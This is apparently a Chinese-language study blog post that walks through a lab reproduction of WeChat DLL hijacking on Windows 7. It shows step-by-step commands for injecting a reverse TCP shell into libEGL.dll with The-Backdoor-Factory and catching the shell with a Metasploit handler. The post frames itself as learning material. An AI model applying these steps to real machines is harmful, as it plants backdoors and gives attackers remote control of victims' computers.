(本文僅為平時學習記錄,若有錯誤請大佬指出,如果本文能幫到你那我也是很開心啦)
該復現參考網絡中的文章,該漏洞復現僅僅是為了學習交流,嚴禁非法使用!!!
一、環境
攻擊者:kali系統
- 安裝后門工具The-Backdoor-Factory(DLL劫持)
靶機:Win 7系統
- 安裝ProcessExplorer,安裝微信
ProcessExplorer:任務管理工具,看到當前系統中所有運行的程序(在溯源、任務管理中很好用)
二、微信DLL劫持反彈shell
1.保證攻擊者與靶機互通

2.在Win7中打開ProcessExplorer,打開微信,並在ProcessExplorer中找到WeChat.exe,點擊WeChat.exe,點擊菜單欄中的View --> Lower Pane View --> DLLs
- 點擊DLLs后,在窗口下方出現了很多.dll文件,這些.dll文件就是當前微信在啟動過程中所需要動態鏈接庫文件,

3.在ProcessExplorer找到安裝在微信里面的動態鏈接庫文件,選擇libEGL.dll動態鏈接庫文件,找到libEGL.dll文件所在位置,將libEGL.dll文件拷貝到kali中的The-Backdoor-Factory后門工具所在的文件夾內,並關閉微信
- 點擊Path,排在前面的.dll文件就是安裝在微信里的或者看路徑是否在安裝路徑下


4.打開kali,進入The-Backdoor-Factory后門工具所在的文件夾內,啟動終端
./backdoor.py 檢查工具是否可用

- 上圖可以看到,工具不可以,沒有名字為capstone的模板
- 解決方法:
pip intall capstone 安裝capstone模板


5.使用The-Backdoor-Factory工具,生成注入后門的動態鏈接庫文件
1 ./backdoor.py -f libEGL.dll -s reverse_shell_tcp_inline -P 6666 -H kali的IP 2 -f 后跟要注入的文件 3 -s 反彈shell,后跟反彈什么類型的shell 4 -P 反彈給哪個端口,后跟端口 5 -H 反彈給哪個主機,后跟IP

- 隨機選擇注入點,這里我選擇1

- 上圖可以看出,生成的動態鏈接庫文件被放到了backdoored文件夾內,進入文件夾內,可以看到libEGL.dll文件,這個文件就是被注入后門的動態鏈接庫文件

6.將被注入后門的動態鏈接庫文件libEGL.dll拷貝到Win7系統中,將原來的libEGL.dll覆蓋

7.開啟postgresql數據庫和Metasploit
1 /etc/init.d/postgresql start 開啟postgresql數據庫 2 msfconsole 開啟Metasploit

8.加載exploits和payloads,查看該模塊需要設置的參數
1 use exploit/multi/handler 選擇exploits(這個exploit經常用來監聽反彈過來的shell) 2 set payload windows/shell_reverse_tcp 設置payload 3 show options 查看所需設置的參數

- 根據上圖的需求設置lhost和lport,並運行攻擊模塊
1 set lhost kali的IP 設置監聽地址 2 set lport 6666 設置監聽端口 3 run 或者exploit 運行攻擊模塊

9.打開Win 7系統,打開微信,然后打開kali就可以得到Win 7的shell(meterpreter)
- 剩下詳細參考https://www.cnblogs.com/yankaohaitaiwei/p/11556921.html,Metasploit的用法比較詳細


